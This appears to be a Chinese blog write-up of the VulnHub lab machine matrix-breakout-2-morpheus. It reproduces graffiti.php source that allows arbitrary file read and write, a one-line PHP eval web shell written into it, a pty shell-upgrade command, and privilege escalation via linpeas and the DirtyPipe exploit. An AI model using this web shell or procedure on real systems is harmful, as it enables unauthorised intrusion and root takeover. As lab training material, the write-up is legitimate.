matrix-breakout-2-morpheus vulnhub靶场

端口扫描
在这里插入图片描述
80
在这里插入图片描述
81

需要用户名密码登录
在这里插入图片描述
目录扫描
在这里插入图片描述
robots.txt

妹用
在这里插入图片描述
找不到利用点,换个扫描器再扫

发现新的文件
在这里插入图片描述
graffiti.txt
在这里插入图片描述

graffiti.php
在这里插入图片描述
输入的数据Post后会回显到页面上
在这里插入图片描述
抓包看看,居然直接传文件路径
在这里插入图片描述
发现我们post的数据被写入了graffiti.txt文件

这里有可能存在文件任意读取漏洞,尝试修改file的值
在这里插入图片描述
发现可以读取graffiti.php文件
在这里插入图片描述
查看php内容

file默认值为graffifi.txt,接收file,message两个post参数

若存在message参数,则打开file文件并写入

<br>
$file="graffiti.txt";
<br>
if($_SERVER['REQUEST_METHOD'] == 'POST') {
<br>
    if (isset($_POST['file'])) {
<br>
       $file=$_POST['file'];
<br>
    }
<br>
    if (isset($_POST['message'])) {
<br>
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
<br>
        fwrite($handle, $_POST['message']);
<br>
	fwrite($handle, "\n");
<br>
        fclose($file); 
<br>
    }
<br>
}
<br>

<br>
// Display file
<br>
$handle = fopen($file,"r");
<br>
while (!feof($handle)) {
<br>
  echo fgets($handle);
<br>
  echo "<br>\n";
<br>
}
<br>
fclose($handle);

可以看出来通过修改file的值,可以实现文件任意写入

直接修改file为graffiti.php,message传入一句话木马,蚁剑连接

<?php @eval($_POST['cc']);?>

在这里插入图片描述
在这里插入图片描述
反弹shell
在这里插入图片描述
半交互回显

python3 -c 'import pty; pty.spawn("/bin/bash")' 

翻找文件时发现的
在这里插入图片描述
提权
上传linpeas.sh
好几个cve漏洞
在这里插入图片描述

从年份近的开始试起

CVE-2022-0847 DirtyPipe

添加链接描述

执行权限好像不够,直接加777
提权成功
在这里插入图片描述

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值